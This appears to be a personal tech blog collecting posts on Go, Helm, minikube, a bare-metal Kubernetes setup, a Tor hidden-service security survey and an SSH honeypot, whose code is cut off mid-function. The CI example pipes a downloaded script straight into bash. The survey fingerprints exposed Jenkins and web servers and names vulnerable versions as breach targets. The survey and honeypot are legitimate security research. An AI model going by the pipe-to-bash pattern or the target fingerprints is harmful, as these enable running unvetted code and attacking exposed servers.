{ Josh Rendek }

<3 Ruby & Go

This is useful if you’re building a generic library or package and want to let callers pass in a type, unmarshal into it, and return it.

 1package main
 2
 3import (
 4	"encoding/json"
 5	"fmt"
 6	"reflect"
 7)
 8
 9type Monkey struct {
10	Bananas int
11}
12
13func main() {
14	deliveryChan := make(chan interface{}, 1)
15	someWorker(&Monkey{}, deliveryChan)
16	monkey := <-deliveryChan
17	fmt.Printf("Monkey: %#v\n", monkey.(*Monkey))
18}
19
20func someWorker(inputType interface{}, deliveryChan chan interface{}) {
21	local := reflect.New(reflect.TypeOf(inputType).Elem()).Interface()
22	json.Unmarshal([]byte(`{"Bananas":20}`), local)
23	deliveryChan <- local
24}

Line 21 gets the type that was passed in and creates a new pointer to that struct type, equivalent to writing &Monkey{}.

Line 22 should use whatever byte array you’re popping off a message queue, stream, or other source to send back.

Helm not updating image, how to fix

Jul 16, 2018 - 1 minutes

If you have imagePullPolicy: Always and deploys aren’t going out (for example, if you’re using a static tag like stable), you may be running into a helm templating bug/feature.

If your helm template diff doesn’t change when being applied, the update won’t go out, even if you’ve pushed a new image to your docker registry.

A quick way to fix this is to set a commit SHA in your CI/CD pipeline; in GitLab, for example, this is $CI_COMMIT_SHA.

If you template this out into a values.yaml file and add it as a label on your Deployment, then when you push out updates your template will differ from the remote one, and helm and tiller will trigger an update, provided you’ve set it properly, for example:

    - helm upgrade -i APP_NAME --set commitHash=$CI_COMMIT_SHA
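Concretely, the wiring might look like this; the commitHash value name matches the --set flag above, while the chart layout is an assumption:

```yaml
# values.yaml (default, overridden by --set commitHash=$CI_COMMIT_SHA)
commitHash: dev
```

Then in templates/deployment.yaml, add `commitHash: {{ .Values.commitHash }}` under the pod template’s labels, so every new SHA changes the rendered manifest and forces a rollout.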

Faster Local Dev With Minikube

Jun 5, 2018 - 1 minutes

If you’re developing against kubernetes services, or want to run your changes inside kubernetes without pushing to a remote registry:

First create a registry running in minikube:

kubectl create -f https://gist.githubusercontent.com/joshrendek/e2ec8bac06706ec139c78249472fe34b/raw/6efc11eb8c2dce167ba0a5e557833cc4ff38fa7c/kube-registry.yaml

Forward your localhost:5000 to 5000 on minikube:

kubectl port-forward --namespace kube-system $(kubectl get po -n kube-system | grep kube-registry-v0 | awk '{print $1;}') 5000:5000

Use minikube’s docker daemon and then push to localhost:5000

eval $(minikube docker-env)
docker push localhost:5000/test-image:latest

And then you can develop your helm charts and deploy quicker using localhost. There’s no need to configure default service account creds or get temporary creds.

Using localhost eliminates the need to use insecure registry settings removing a lot of docker daemon configuration steps.

Kubernetes On Bare Metal

Apr 1, 2018 - 13 minutes

If you’ve been following kubernetes, you’ll understand there’s a myriad of options available. I’ll cover a few of them briefly and why I didn’t choose them. Don’t know what Kubernetes is? Minikube is the best way to get going locally.

This guide will take you from nothing to a 2 node cluster, automatic SSL for deployed apps, a custom PVC/PV storage class using NFS, and a private docker registry. Helpful tips and bugs I ran into are sprinkled throughout their respective sections.

But first the goals for this cluster:
  • First-class SSL support with LetsEncrypt so we can easily deploy new apps with SSL using just annotations.
  • Bare metal for this conversation means a regular VM/VPS provider or a regular private provider like Proxmox with no special services - or actual hardware.
  • Not require anything fancy (like BIOS control)
  • Be reasonably priced (<$50/month)
  • Be reasonably production-y (this is for side projects, not a huge business critical app). Production-y for this case means a single master with backups being taken of the node.
  • Works with Ubuntu 16.04
  • Works on Vultr (and others like Digital Ocean - providers that are (mostly) generic VM hosts and don’t have specialized APIs and services like AWS/GCE)
  • I also recommend making sure your VM provider supports a software defined firewall and a private network, however this is not a hard requirement.

Overview of Options
  • OpenShift: Owned by RedHat - uses its own special tooling around oc. Minimum requirements were too high for a small cluster. Pretty high vendor lock-in.
  • KubeSpray: unstable. It used to work pretty consistently around 1.6 but when trying to spin up a 1.9 cluster and 1.10 cluster it was unable to finish. I am a fan of Ansible, and if you are as well, this is the project to follow I think.
  • Google Kubernetes Engine: Attempting to stay away from cloud-y providers so outside of the scope of this. If you want a managed offering and are okay with GKE pricing, this is the way to go.
  • AWS: Staying away from cloud-y providers. Cost is also a big factor here since this is a side-project cluster.
  • Tectonic: Requirements are too much for a small cloud provider/installation (PXE boot setup, Matchbox, F5 LB).
  • Kops: Only supports AWS and GCE.
  • Canonical Juju: Requires MAAS, attempted to use but kept getting errors around lxc. Seems to favor cloud provider deploys (AWS/GCE/Azure).
  • Kubicorn: No bare metal support, needs cloud provider APIs to work.
  • Rancher: Rancher is pretty awesome, unfortunately it’s incredibly easy to break the cluster and break things inside Rancher that make the cluster unstable. It does provide a very simple way to play with kubernetes on whatever platform you want.

… And the winner is… Kubeadm. It’s not in any incubator stages and is documented as one of the official ways to get a cluster setup.

Servers we’ll need:
  • $5 (+$5 for 50G block storage) - NFS Pod storage server ( 1 CPU / 1GB RAM / block storage )
  • $5 - 1 Master node ( 1 CPU / 1G RAM )
  • $20 - 1 Worker node ( 2 CPU / 4G RAM - you can choose what you want for this )
  • $5 - (optional) DB server - due to bugs I’ve run into in production environments with docker, various smart people saying not to do it, and file system consistency issues, I run a separate DB server for my apps to connect to if they need it.

Total cost: $40.00

Base Worker + Master init-script
 1#!/bin/bash
 2apt-get update
 3apt-get upgrade -y
 4apt-get -y install python
 5IP_ADDR=$(echo 10.99.0.$(ip route get | awk '{print $NF; exit}' | cut -d. -f4))
 6cat <<- EOF >> /etc/network/interfaces
 7auto ens7
 8iface ens7 inet static
 9    address $IP_ADDR
10    netmask
11    mtu 1450
12EOF
13ifup ens7
14
15apt-get install -y apt-transport-https
16apt -y install docker.io
17systemctl start docker
18systemctl enable docker
19curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
20echo "deb http://apt.kubernetes.io/ kubernetes-xenial main" >/etc/apt/sources.list.d/kubernetes.list
21apt-get update
22apt-get install -y kubelet kubeadm kubectl kubernetes-cni nfs-common

Lines 2-13 run on server boot: they update and upgrade everything, install python (used so Ansible can connect and do things later), and then add the private network address. Since Vultr gives you a true private network, I’m cheating a bit and just using the last octet of the public IP to define my internal LAN IP.

Line 16 we’re installing the Ubuntu packaged version of docker – this is important. There are a lot of tools that don’t bundle the proper docker version to go along with their k8s installation and that can cause all kinds of issues, including everything not working due to version mismatches.

Lines 15-22 we’re installing the kubernetes repo tools for kubeadm and kubernetes itself.

Setting up the NFS Server

I’m not going to go in depth on setting up an NFS server; there are a million guides. I will, however, mention the exports section, which I’ve cobbled together after a few experiments and reading OpenShift docs. There’s also a good amount of documentation if you want to go the Ceph storage route, however NFS was the simplest solution to get set up.

Remember to lock down your server with a firewall so everything is locked down except internal network traffic to your VMs.



Export options:

  • no_root_squash - this shouldn’t be used for shared services, but if it’s for your own use and not accessed anywhere else, this is fine. This lets the docker containers work as whatever user they boot as without conflicting with permissions on the NFS server.
  • no_subtree_check - prevents issues with files being open and renamed at the same time
  • no_wdelay - generally prevents NFS from trying to be smart about when to write, and forces it to write to the disk ASAP.
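Putting those options together, a single /etc/exports entry might look like this (the path and subnet are placeholders for your own setup):

```
/srv/nfs/kubedata 10.99.0.0/24(rw,sync,no_root_squash,no_subtree_check,no_wdelay)
```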

Setting up the master node

On the master node run kubeadm to init the cluster and start kubernetes services:

kubeadm init --allocate-node-cidrs=true --cluster-cidr=

This will start the cluster and set up a pod network on for internal pods to use.

Next you’ll notice that the node is in a NotReady state when you do a kubectl get nodes. We need to setup our worker node next.

You can either continue using kubectl on the master node or copy the config to your workstation (depending on how your network permissions are setup):

mkdir -p $HOME/.kube
cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
chown $(id -u):$(id -g) $HOME/.kube/config

Setting up the worker node

You’ll get a join command with a token to run on workers from the previous step. If you need to generate new tokens later on when you’re expanding your cluster, you can use kubeadm token list and kubeadm token create.

Important Note: Your worker nodes must have unique hostnames, otherwise they will join the cluster and overwrite each other (the 1st node will disappear and things will get rebalanced to the node you just joined). If this happens to you and you want to reset a node, you can run kubeadm reset on that worker node.

Setting up pod networking (Flannel)

Back on the master node we can add our Flannel network overlay. This will let the pods reside on different worker nodes and communicate with each other over internal DNS and IPs.

kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml
kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/k8s-manifests/kube-flannel-rbac.yml

After a few seconds you should see output from kubectl get nodes similar to this (depending on hostnames):

root@k8s-master:~# kubectl get nodes
NAME           STATUS    ROLES     AGE       VERSION
k8s-master     Ready     master    4d        v1.10.0
k8s-worker     Ready     <none>    4d        v1.10.0

Deploying the Kubernetes Dashboard

If you need more thorough documentation, head on over to the dashboard repo. We’re going to follow a vanilla installation:

kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/master/src/deploy/recommended/kubernetes-dashboard.yaml

Once that is installed you need to setup a ServiceAccount that can request tokens and use the dashboard, so save this to dashboard-user.yaml:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: admin-user
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: admin-user
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: admin-user
  namespace: kube-system

and then apply it

kubectl apply -f dashboard-user.yaml

Next you’ll need to grab the service token for dashboard authentication and fire up kubectl proxy:

kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep admin-user | cut -f1 -d ' ') | grep -E '^token' | cut -f2 -d':' | tr -d '\t'
kubectl proxy

Now you can access the dashboard at http://localhost:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/login.

Setting up our NFS storage class

When using a cloud provider you normally get a default storage class provided for you (like on GKE). With our bare metal installation if we want PersistentVolumes (PVs) and PersistentVolumeClaims (PVCs) to work, we need to set up our own private storage class.

We’ll be using nfs-client from the incubator for this.

The best way to do this is to clone the repo and go to the nfs-client directory and edit the following files:

  • deploy/class.yaml: This is what your storage class will be called when setting up storage and in kubectl get sc output:
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: managed-nfs-storage
provisioner: joshrendek.com/nfs # or choose another name, must match deployment's env PROVISIONER_NAME'
  • deploy/deployment.yaml: make sure your provisioner name matches here, and that your NFS server IP and the mount you’re exporting are set properly.
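For reference, the part of deploy/deployment.yaml that has to line up looks roughly like this (the IP and path are placeholders):

```yaml
env:
  - name: PROVISIONER_NAME
    value: joshrendek.com/nfs   # must match the provisioner in class.yaml
  - name: NFS_SERVER
    value: 10.99.0.5            # placeholder: your NFS server's private IP
  - name: NFS_PATH
    value: /srv/nfs/kubedata    # placeholder: the path you export
```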

Create a file called nfs-test.yaml:

kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: test-claim
  annotations:
    volume.beta.kubernetes.io/storage-class: "managed-nfs-storage"
spec:
  accessModes:
    - ReadWriteMany
  resources:
    requests:
      storage: 1Mi
---
kind: Pod
apiVersion: v1
metadata:
  name: test-pod
spec:
  containers:
  - name: test-pod
    image: gcr.io/google_containers/busybox:1.24
    command:
      - "/bin/sh"
    args:
      - "-c"
      - "touch /mnt/SUCCESS && exit 0 || exit 1"
    volumeMounts:
      - name: nfs-pvc
        mountPath: "/mnt"
  restartPolicy: "Never"
  volumes:
    - name: nfs-pvc
      persistentVolumeClaim:
        claimName: test-claim

Next just follow the repository instructions:

kubectl apply -f deploy/deployment.yaml
kubectl apply -f deploy/class.yaml
kubectl create -f deploy/auth/serviceaccount.yaml
kubectl create -f deploy/auth/clusterrole.yaml
kubectl create -f deploy/auth/clusterrolebinding.yaml
kubectl patch deployment nfs-client-provisioner -p '{"spec":{"template":{"spec":{"serviceAccount":"nfs-client-provisioner"}}}}'
kubectl patch storageclass managed-nfs-storage -p '{"metadata": {"annotations":{"storageclass.kubernetes.io/is-default-class":"true"}}}'

This creates all the RBAC permissions, adds them to the deployment, and then sets the default storage class provider in your cluster. You should see something similar when running kubectl get sc now:

NAME                            PROVISIONER           AGE
managed-nfs-storage (default)   joshrendek.com/nfs   4d

Now let’s test our deployment and check the NFS share for the SUCCESS file:

kubectl apply -f nfs-test.yaml

If everything is working, move on to the next sections: you’ve gotten NFS working! The only problem I ran into at this point was mistyping my NFS server IP. You can debug this by running kubectl get events -w, watching the mount command output, and trying to replicate it on the command line from a worker node.

Installing Helm

Up until this point we’ve just been using kubectl apply and kubectl create to install apps. We’ll be using helm to manage our applications and install things going forward for the most part.

If you don’t already have helm installed (and are on OSX): brew install kubernetes-helm, otherwise hop on over to the helm website for installation instructions.

First we’re going to create a helm-rbac.yaml:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: tiller
  namespace: kube-system
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: tiller-clusterrolebinding
subjects:
- kind: ServiceAccount
  name: tiller
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: ""

Now we can apply everything:

kubectl create -f helm-rbac.yaml
kubectl create serviceaccount --namespace kube-system tiller
kubectl create clusterrolebinding tiller-cluster-rule --clusterrole=cluster-admin --serviceaccount=kube-system:tiller
helm init --upgrade
kubectl patch deploy --namespace kube-system tiller-deploy -p '{"spec":{"template":{"spec":{"serviceAccount":"tiller"}}}}'

First we install the RBAC permissions, service accounts, and role bindings. Next we install helm and initialize tiller on the server. Tiller keeps track of which apps are deployed where and when they need updates. Finally we tell the tiller deployment about its new ServiceAccount.

You can verify things are working with a helm ls. Next we can install our first application, Heapster.

Important Helm Note: Helm is great, but sometimes it breaks. If your deployments/upgrades/deletes are hanging, try bouncing the tiller pod:

kubectl delete po -n kube-system -l name=tiller

Installing Heapster

Heapster provides in-cluster metrics and health information:

helm install stable/heapster --name heapster --set rbac.create=true

You should see it installed with a helm ls.

Installing Traefik (LoadBalancer)

First let’s create a traefik.yaml values file:

serviceType: NodePort
externalTrafficPolicy: Cluster
replicas: 2
cpuRequest: 10m
memoryRequest: 20Mi
cpuLimit: 100m
memoryLimit: 30Mi
debug:
  enabled: false
ssl:
  enabled: true
acme:
  enabled: true
  email: [email protected]
  staging: false
  logging: true
  challengeType: http-01
  persistence:
    enabled: true
    annotations: {}
    accessMode: ReadWriteOnce
    size: 1Gi
dashboard:
  enabled: true
  domain: # YOUR DOMAIN HERE
  service:
    annotations:
      kubernetes.io/ingress.class: traefik
  auth:
    basic:
gzip:
  enabled: true
accessLogs:
  enabled: false
  ## Path to the access logs file. If not provided, Traefik defaults it to stdout.
  # filePath: ""
  format: common  # choices are: common, json
rbac:
  enabled: true
## Enable the /metrics endpoint, for now only supports prometheus
## set to true to enable metric collection by prometheus
deployment:
  hostPort:
    httpEnabled: true
    httpsEnabled: true

Important things to note here are the hostPort settings: with multiple worker nodes this lets us specify multiple A records for some level of redundancy, binding to host ports 80 and 443 so the nodes can receive HTTP and HTTPS traffic directly. The other important setting is serviceType: NodePort, so we expose ourselves on the worker node’s IP (on something like GKE or AWS we would instead register with an ELB, and that ELB would talk to our k8s cluster).

Now lets install traefik and the dashboard:

helm install stable/traefik --name traefik -f traefik.yaml --namespace kube-system

You can check the progress of this with kubectl get po -n kube-system -w. Once everything is registered you should be able to go to https://traefik.sub.yourdomain.com and log in to the dashboard with the basic auth you configured.

Private Docker Registry

Provided you got everything working in the previous step (HTTPS works and LetsEncrypt was automatically set up for your traefik dashboard) you can continue on.

First we’ll be making a registry.yaml file with our custom values and enable traefik for our ingress:

replicaCount: 1
ingress:
  enabled: true
  # Used to create an Ingress record.
  hosts:
    - registry.svc.bluescripts.net
  annotations:
    kubernetes.io/ingress.class: traefik
persistence:
  accessMode: 'ReadWriteOnce'
  enabled: true
  size: 10Gi
  # storageClass: '-'
# set the type of filesystem to use: filesystem, s3
storage: filesystem
secrets:
  haSharedSecret: ""

And putting it all together:

helm install -f registry.yaml --name registry stable/docker-registry

Provided all that worked, you should now be able to log in to your registry at registry.sub.yourdomain.com and push and pull images.

Configuring docker credentials (per namespace)

There are several ways you can set up docker auth, like ServiceAccounts or ImagePullSecrets - I’m going to show the latter.

Take your docker config that should look something like this:

{
        "auths": {
                "registry.sub.yourdomain.com": {
                        "auth": "BASE64 ENCODED user:pass"
                }
        }
}

and base64 encode that whole file/string. Make it all one line, then create a registry-creds.yaml file:

apiVersion: v1
kind: Secret
metadata:
  name: regcred
  namespace: your_app_namespace
data:
  .dockerconfigjson: BASE64_ENCODED_CREDENTIALS
type: kubernetes.io/dockerconfigjson

Create your app namespace: kubectl create namespace your_app_namespace and apply it.

kubectl apply -f registry-creds.yaml

You can now delete this file (or encrypt it with GPG, etc) - just don’t commit it anywhere. Base64 encoding a string won’t protect your credentials.
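One way to produce that single-line base64 string (shown here against a stand-in file so the commands run anywhere; point it at your real ~/.docker/config.json instead):

```shell
# Stand-in docker config; substitute ~/.docker/config.json for real use.
printf '%s' '{"auths":{}}' > /tmp/docker-config.json
# base64-encode and strip newlines so the secret value is a single line
base64 < /tmp/docker-config.json | tr -d '\n'
# → eyJhdXRocyI6e319
```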

You would then reference it in your helm chart’s deployment.yaml like:

spec:
  replicas: {{ .Values.replicaCount }}
  template:
    metadata:
      labels:
        app: {{ template "fullname" . }}
    spec:
      imagePullSecrets:
        - name: regcred

Deploying your own applications

I generally make a deployments folder then do a helm create app_name in there. You’ll want to edit the values.yaml file to match your docker image names and vars.

You’ll need to edit the templates/ingress.yaml file and make sure you have a traefik annotation:

  annotations:
    kubernetes.io/ingress.class: traefik

And finally here is an example deployment.yaml that has a few extra things from the default:

 1apiVersion: extensions/v1beta1
 2kind: Deployment
 3metadata:
 4  name: {{ template "fullname" . }}
 5  labels:
 6    chart: "{{ .Chart.Name }}-{{ .Chart.Version | replace "+" "_" }}"
 7spec:
 8  replicas: {{ .Values.replicaCount }}
 9  template:
10    metadata:
11      labels:
12        app: {{ template "fullname" . }}
13    spec:
14      imagePullSecrets:
15        - name: regcred
16      affinity:
17        podAntiAffinity:
18          requiredDuringSchedulingIgnoredDuringExecution:
19          - topologyKey: "kubernetes.io/hostname"
20            labelSelector:
21              matchLabels:
22                app:  {{ template "fullname" . }}
23      containers:
24      - name: {{ .Chart.Name }}
25        image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
26        imagePullPolicy: {{ .Values.image.pullPolicy }}
27        ports:
28        - containerPort: {{ .Values.service.internalPort }}
29        livenessProbe:
30          httpGet:
31            path: /
32            port: {{ .Values.service.internalPort }}
33          initialDelaySeconds: 5
34          periodSeconds: 30
35          timeoutSeconds: 5
36        readinessProbe:
37          httpGet:
38            path: /
39            port: {{ .Values.service.internalPort }}
40          initialDelaySeconds: 5
41          timeoutSeconds: 5
42        resources:
43{{ toYaml .Values.resources | indent 10 }}

On lines 14-15 we’re specifying the registry credentials we created in the previous step.

Assuming a replica count >= 2, lines 16-22 tell kubernetes to schedule the pods on different worker nodes. This prevents both web servers (for instance) from being put on the same node in case one of them crashes.

Lines 29-41 will depend on your app - if your server is slow to start up, these values may not make sense and can cause your app to constantly cycle through Running/Error states as its containers get reaped by the liveness checks.
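For a slow-booting app, a reasonable starting point is to stretch the probe timings rather than remove the probes; the numbers below are illustrative, not from the chart above:

```yaml
livenessProbe:
  httpGet:
    path: /
    port: {{ .Values.service.internalPort }}
  initialDelaySeconds: 60   # give a slow app a full minute before the first check
  periodSeconds: 30
  timeoutSeconds: 10
  failureThreshold: 3       # three consecutive misses before a restart
```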

And provided you just have configuration changes to try out (container is already built and in a registry), you can iterate locally:

helm upgrade your_app_name . -i --namespace your_app_name --wait --debug

Integrating with GitLab / CICD Pipelines

Here is a sample .gitlab-ci.yml that you can use for deploying - this builds a small go binary for ifcfg.net:

 1stages:
 2    - build
 3    - deploy
 4
 5variables:
 6  DOCKER_DRIVER: overlay2
 7  IMAGE: registry.sub.yourdomain.com/project/web
 8
 9services:
10- docker:dind
11
12build:
13  image: docker:latest
14  stage: build
15  script:
16    - docker build -t $IMAGE:$CI_COMMIT_SHA .
17    - docker tag $IMAGE:$CI_COMMIT_SHA $IMAGE:latest
18    - docker push $IMAGE:$CI_COMMIT_SHA
19    - docker push $IMAGE:latest
20
21deploy:
22  image: ubuntu
23  stage: deploy
24  before_script:
25    - apt-get update && apt-get install -y curl
26    - curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | bash
27  script:
28    - cd deployment/ifcfg
29    - KUBECONFIG=<(echo "$KUBECONFIG") helm upgrade ifcfg . -i --namespace ifcfg --wait --debug --set "image.tag=$CI_COMMIT_SHA"

Lines 16-19 are where we tag both the committed SHA and latest, and push both to the registry we made in the previous steps.

Line 26 is installing helm.

Line 29 is doing a few things. First, note that we have our ~/.kube/config file set as an environment variable in GitLab. The <(echo ...) construct is a little shell trick that makes the variable’s contents look like a file on the file system (that way we don’t have to write it out in a separate step). upgrade -i says to upgrade our app, and if it doesn’t exist yet, to install it. The last important bit is image.tag=$CI_COMMIT_SHA - this sets you up for deploying tagged releases instead of always deploying the latest from your repository.
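The process substitution trick can be tried locally (bash required; the variable here is a stand-in for the real kubeconfig contents):

```shell
# <(cmd) exposes cmd's stdout as a readable /dev/fd path, letting
# file-only tools consume a variable's contents without a temp file.
KUBECONFIG_DATA='apiVersion: v1'
cat <(echo "$KUBECONFIG_DATA")   # prints: apiVersion: v1
```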

That’s it - you should now have an automated build pipeline set up for a project on your working kubernetes cluster.

The goal of this project was to start with a base directory (in this case The Hidden Wiki) and start spidering out to discover all reachable Tor servers. Some restrictions were placed on this after a few trial runs:

  • Only HTML/JSON was parsed/spidered for more links to follow (no jpegs/xml, etc)
  • There were a few skipped websites, notably Facebook, Reddit, and a few blockchain websites, due to the amount of spidering/time that would be required
  • Limited to 10k visits per host so we wouldn’t keep spidering infinitely and could finish in a reasonable time frame
  • Non 200 OK status responses were skipped


Stack & Tools

I used a few different tools to build this out:

  • HA Proxy to load balance between tor SOCKS proxies so multiple could be run at the same time to saturate a network link
  • Redis to store state information about visits
  • Golang for the spidering
  • Postgres for data storage

This was all run on a single dedicated server over the period of about 1 week, multiple prototypes ran before that to flush out bugs.

Crawl Stats

Metric Count
Total Hosts 107,067
Total Scanned Pages 14,177,383
Total Visited (non-200+) 17,038,091

Security Headers

Technology % using
Content Security Policy (CSP) 0.15%
Secure Cookie 0.01%
– httpOnly 0%
Cross-origin Resource Sharing (CORS) 0.07%
– Subresource Integrity (SRI) 0%
Public Key Pinning (HPKP) 0.01%
Strict Transport Security (HSTS) 0.11%
X-Content-Type-Options (XCTO) 0.52%
X-Frame-Options (XFO) 0.58%
X-XSS-Protection 0%

Some of these headers are interesting when viewed through a Tor lens. HSTS and HPKP, for example, can be used for supercookies and tracking (although tor does protect against this across new identities) (source).

Services implementing CORS also help protect users by preventing cookie fingerprinting via scripts and other malicious fingerprinting methods.

Software Stats

We can fingerprint and figure out exposed software by taking a look at a few different signatures, like cookies and headers. There are other methods to fingerprint using the response body but due to server restrictions and time I couldn’t save every single page source, so the results based on headers/titles are below:

Source code hosting

Software Type Identifier
Gitea Cookie i_like_gitea [src]
GitLab Cookie gitlab_session [src]
Gogs Forked version has header X-Clacks-Overhead: GNU Terry Pratchett from NotABug.org

Build Servers

I’m going to focus on build servers because I think this is the easiest front to breach. Not only has Jenkins had some serious RCEs in the past, it is very helpful in identifying itself with headers and debug information, as seen below. People also generally store sensitive information in build servers, such as SSH keys and cloud provider credentials.

| X-Jenkins-Session: 8965d09b
| X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAA.....
| Server: Jetty(9.2.z-SNAPSHOT)
| X-Xss-Protection: 1
| X-Jenkins: 2.60.1
| X-Jenkins-Cli-Port: 46689
| X-Content-Type-Options: nosniff nosniff
| X-Frame-Options: sameorigin sameorigin
| X-Hudson-Theme: default
| X-Jenkins-Cli2-Port: 46689
| Referrer-Policy: same-origin
| Content-Type: text/html;charset=UTF-8
| X-Hudson: 1.395
| X-Hudson-Cli-Port: 46689
| Set-Cookie: JSESSIONID.112b5e69=16uts5qfqz6j....Path=/;Secure;HttpOnly

We can get Jenkins version, CLI ports, and Jetty versions all from just visiting the host.

Software Type Identifier
Jenkins Headers X-Jenkins- and X-Hudson- style headers
GitLab Cookie gitlab_session
Gocd Cookie Path / Title Generally sets a cookie path at /go and uses - Go in <title> tags
Drone Title Sets a drone title

Unfortunately I was unable to find any exposed Gocd or Drone servers.

Software Tracking

Software Type Identifier
Trac Cookie trac_session
Redmine Cookie redmine_session

I was not able to find any running BugZilla, Mantis or OTRS instances.

Total with Server Header: 15,630

Total without header: 91,437

Top 10 (full list of 282 available for download)

nginx | 9619
Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.6.30 | 2659
Apache | 1056
nginx/1.6.2 | 249
nginx/1.13.1 | 210
Apache/2.4.10 (Debian) | 161
Apache/2.4.18 (Ubuntu) | 100
Apache/2.2.22 (Debian) | 90
Apache/2.4.7 (Ubuntu) | 82
lighttpd/1.4.31 | 80
FobbaWeb/0.1 | 78
Full list available here

Just from the Server header we can gather a bunch of useful information:

  • 2,659 servers are running a potentially vulnerable OpenSSL version (1.0.1e) [vulns] and vulnerable Apache version [vulns]
  • Many servers are leaving the OS tag on, revealing a mix of operating systems. I think it’s also a safe assumption that the same people who leave fingerprinting on will also be using the OS package of these servers, making it easy to combine OS vulnerabilities and web server vulnerabilities into attack vectors:
    • CentOS
    • Debian
    • Ubuntu
    • Windows
    • Raspbian
    • Amazon Linux
    • Fedora
    • Red Hat
    • Trisquel
    • YellowDog
    • FreeBSD
    • Scientific Linux
    • Vine
  • Some people are exposing application servers directly:
    • thin
    • node-static
    • gunicorn
    • Mojolicious
    • WSGI
    • Jetty
    • GlassFish
  • Very old versions of IIS (5.0/6.0), Apache (1.3), and Nginx
  • Nginx appears to dominate the server share on Tor - just taking the top 2 into account, nginx is at least 3.5x as popular as Apache


This was a fun project to work on and I learned quite a bit about scaling up the tor binary in order to scan the network faster. I’m hoping to make this process a bit less manual and start publishing these results regularly over at my security data website, https://hnypots.com

Have any suggestions for other software to look for? Leave a comment and let me know!

I’ve been running https://sshpot.com/ for a while now - and decided it needed to be revamped and overhauled - and thought I’d make a presentation and write up some details on the process as well. If you’d like to just view the slides, hop over here.

If you’re just looking for the source code:


Design goals

I wanted to make sure this was an improvement over the previous iteration, so I laid out several goals for the rewrite:

  • Appear more ‘vulnerable’
  • Correlate commands/sessions (old version just logged data)
  • Proxy requests and capture data
  • Better statistics
  • Redesigned command simulation using interfaces instead of simple string matching

Some important steps the honeypot must do:

  • generate a new private key pair for the server on every boot (appear like a fresh server)
  • Advertise a vulnerable version - check past CVEs if you want to target a specific one. Importantly, the banner must start with SSH-2.0 or the client won’t handshake
  • Must listen on port 22, so you should move the actual SSHD to port 2222 (or any other port, for example)
  • Do the SSH handshake
  • Handle requests

Appearing More Vulnerable

We need to create an SSH config for the ssh package to use when constructing a new object. An important thing to note here is the SSH-2.0 prefix to the ServerVersion - if that is missing the client will do weird things (including not connecting).

1sshConfig := &ssh.ServerConfig{
2		PasswordCallback:  passAuthCallback,
3		PublicKeyCallback: keyAuthCallback,
4		ServerVersion:     "SSH-2.0-OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013", // old and vulnerable!
5	}

Correlating Sessions and Commands

In order to correlate requests we can use the permission extension in the ssh package to store a map of data - in our case, a simple GUID to keep state across requests. This could also be used to store a user id or some other type of session identifier, for instance, if you were trying to write your own replacement ssh daemon to do things like serving up git requests.

 1func passAuthCallback(conn ssh.ConnMetadata, password []byte) (*ssh.Permissions, error) {
 2	guid := uuid.NewV4()
 3	ip, remotePort := parseIpPortFrom(conn)
 4	login := SshLogin{RemoteAddr: ip,
 5		RemotePort: remotePort,
 6		Username:   conn.User(),
 7		Password:   string(password),
 8		Guid:       guid.String(),
 9		Version:    string(conn.ClientVersion()),
10		LoginType:  "password",
11	}
12	login.Save()
13	return &ssh.Permissions{Extensions: map[string]string{"guid": guid.String()}}, nil
14}

We want to capture as much metadata about the connection as possible, as well as capture public keys that are available when the attacker is using an ssh-agent - this can help us in the future to possibly identify bad actors. Here we marshal the public key and capture the key type being sent.

 1func keyAuthCallback(conn ssh.ConnMetadata, key ssh.PublicKey) (*ssh.Permissions, error) {
 2	guid := uuid.NewV4()
 3	ip, remotePort := parseIpPortFrom(conn)
 4	login := SshLogin{RemoteAddr: ip,
 5		RemotePort: remotePort,
 6		Username:   conn.User(),
 7		Guid:       guid.String(),
 8		Version:    string(conn.ClientVersion()),
 9		PublicKey:  key.Marshal(),
10		KeyType:    string(key.Type()),
11		LoginType:  "key",
12	}
13	go login.Save()
14	//log.Println("Fail to authenticate", conn, ":", err)
15	//return nil, errors.New("invalid authentication")
16	return &ssh.Permissions{Extensions: map[string]string{"guid": guid.String()}}, nil
17}

Proxying Requests and Capturing Data

Now we can talk about proxying requests. I’m going to throw some code at you then explain below:

 1func HandleTcpReading(channel ssh.Channel, term *terminal.Terminal, perms *ssh.Permissions) {
 2	defer channel.Close()
 3	for {
 4		// read up to 1MB of data
 5		b := make([]byte, 1024*1024)
 6		_, err := channel.Read(b)
 7		if err != nil {
 8			if err.Error() == "EOF" {
 9				return
10			}
11		}
12		read := bufio.NewReader(strings.NewReader(string(b)))
13		toReq, err := http.ReadRequest(read)
14		// TODO: https will panic atm - not supported
15		if err != nil {
16			log.Println("Error parsing request: ", err)
17			return
18		}
19		err = toReq.ParseForm()
20		if err != nil {
21			log.Println("Error parsing form: ", err)
22			return
23		}
24		url := fmt.Sprintf("%s%s", toReq.Host, toReq.URL)
26		httpReq := &HttpRequest{
27			Headers:  toReq.Header,
28			URL:      url,
29			FormData: toReq.Form,
30			Method:   toReq.Method,
31			Guid:     perms.Extensions["guid"],
32			Hostname: toReq.Host,
33		}
35		client := &http.Client{}
36		resp, err := client.Get(fmt.Sprintf("http://%s", url))
